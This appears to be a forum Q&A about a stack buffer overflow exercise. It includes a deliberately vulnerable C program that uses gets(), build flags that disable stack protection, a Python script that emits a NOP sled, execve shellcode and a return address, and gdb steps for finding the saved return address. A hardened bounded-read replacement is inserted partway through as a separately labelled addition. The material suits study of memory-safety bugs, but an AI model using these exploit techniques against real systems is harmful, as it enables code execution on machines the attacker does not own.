
Unable to run stack buffer overflow exploit

I have to inject code into the following buffer overflow program. The code should print the hostname. I have an opcode sequence ( \x31\xc0\x50\x68\x6e\x61\x6d\x65\x68\x68\x6f\x73\x74\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x54\x53\xb0\x0b\x50\xcd\x80 ) which works. I have used NOPs and a repeated return address. But I'm not able to run the code with it and I always end up with a segmentation fault. Can anyone help me with this?

Vulnerable.c

#include <stdio.h>
#include <stdlib.h>

int vulnerable(void);                 /* forward declaration so main() compiles cleanly */
int main(int argc, char **argv)
{
  char *stuff = 0;                    /* unused */
  int len = 0;                        /* unused */
  vulnerable();
  return 0;
}

int
vulnerable(void)
{
  char buf[100];                      /* 100-byte stack buffer */
  printf("enter your name: ");
  fflush(stdout);
  gets(buf);                          /* no bounds check: this is the overflow */
  printf("\"%s\"\n Welcome", buf );
  return 0;
}

I compiled the above program with

gcc -ggdb -mpreferred-stack-boundary=2 -fno-stack-protector -z execstack -o vulnerable vulnerable.c

Shellcode.py

# Python 2: NOP sled, then the shellcode, then the guessed return address repeated
print "\x90"*51 +"\x31\xc0\x50\x68\x6e\x61\x6d\x65\x68\x68\x6f\x73\x74\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x54\x53\xb0\x0b\x50\xcd\x80" + "\xd8\xf3\xff\xbf"*6

I have called this python program on the command line with

python shellcode.py | ./vulnerable
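For comparison, a hardened replacement for the gets() call in vulnerable(), added here as an example that is not part of the question or of any answer: read_line_bounded and overflow_check are names chosen for this example, and the input overflow_check feeds through a 100-byte buffer is constructed. It also handles the edge case where a line exactly fills the buffer, which a plain fgets() check would misreport as truncated.

```c
#include <stdio.h>
#include <string.h>

/* Hardened replacement for the gets() call in vulnerable(): reads one line
 * into dst without ever writing past dstsz bytes. Returns 0 if the whole
 * line fit, 1 if it was longer than the buffer (the excess is discarded so
 * the next read starts on a fresh line), -1 on EOF/error. */
int read_line_bounded(char *dst, size_t dstsz, FILE *in)
{
    if (dstsz == 0 || fgets(dst, (int)dstsz, in) == NULL)
        return -1;
    size_t n = strlen(dst);
    if (n > 0 && dst[n - 1] == '\n') {
        dst[n - 1] = '\0';               /* strip the newline gets() drops */
        return 0;
    }
    /* No newline: either the line exactly filled the buffer or it is longer.
     * Peek one character to tell the two apart, then drain any excess. */
    int c = getc(in);
    if (c == '\n' || c == EOF)
        return 0;
    while (c != EOF && c != '\n')
        c = getc(in);
    return 1;
}

/* Self-check on constructed input: a line of line_len 'A's followed by a
 * second line "next", read through a 100-byte buffer like vulnerable()'s.
 * Returns the truncation flag of the first line, or -1 if the buffer was
 * overrun or the second line was not read intact. */
int overflow_check(size_t line_len)
{
    char input[512], buf[100];
    if (line_len > sizeof input - 8)
        return -1;
    memset(input, 'A', line_len);
    memcpy(input + line_len, "\nnext\n", 7);           /* includes the NUL */
    FILE *in = tmpfile();                              /* stand-in for stdin */
    if (in == NULL)
        return -1;
    fputs(input, in);
    rewind(in);
    int truncated = read_line_bounded(buf, sizeof buf, in);
    int ok = strlen(buf) < sizeof buf                  /* never overran */
          && read_line_bounded(buf, sizeof buf, in) == 0
          && strcmp(buf, "next") == 0;
    fclose(in);
    return ok ? truncated : -1;
}
```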

I suggest you turn on core dumps:

ulimit -c unlimited

then do a simple buffer overflow like perl -e 'print "A"x130' and the system will generate the dump; open it with gdb -c core and you will see %eip=0x41414141

Then you can reduce the injected buffer, like perl -e 'print "A"x120', until you get exactly the size of the buffer needed to overwrite RET.

Can you describe the steps to find out the return address?

c> shellcode.py >shellcode
c> gdb vulnerable
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu"...
(gdb) b vulnerable
Breakpoint 1 at 0x80484e6: file vulnerable.c, line 17.
(gdb) r <shellcode
Starting program: /home/armali/bin/so/c/vulnerable <shellcode

Breakpoint 1, vulnerable () at vulnerable.c:17
17        printf("enter your name: ");
(gdb) info frame
Stack level 0, frame at 0xbffff7bc:
 eip = 0x80484e6 in vulnerable (vulnerable.c:17); saved eip 0x80484c9
 called by frame at 0xbffff7cc
 source language c.
 Arglist at 0xbffff7bc, args: 
 Locals at 0xbffff7bc, Previous frame's sp is 0x0
 Saved registers:
  ebp at 0xbffff7bc, eip at 0xbffff7c0

The example shows that the return address eip 0x80484c9 is saved at 0xbffff7c0.
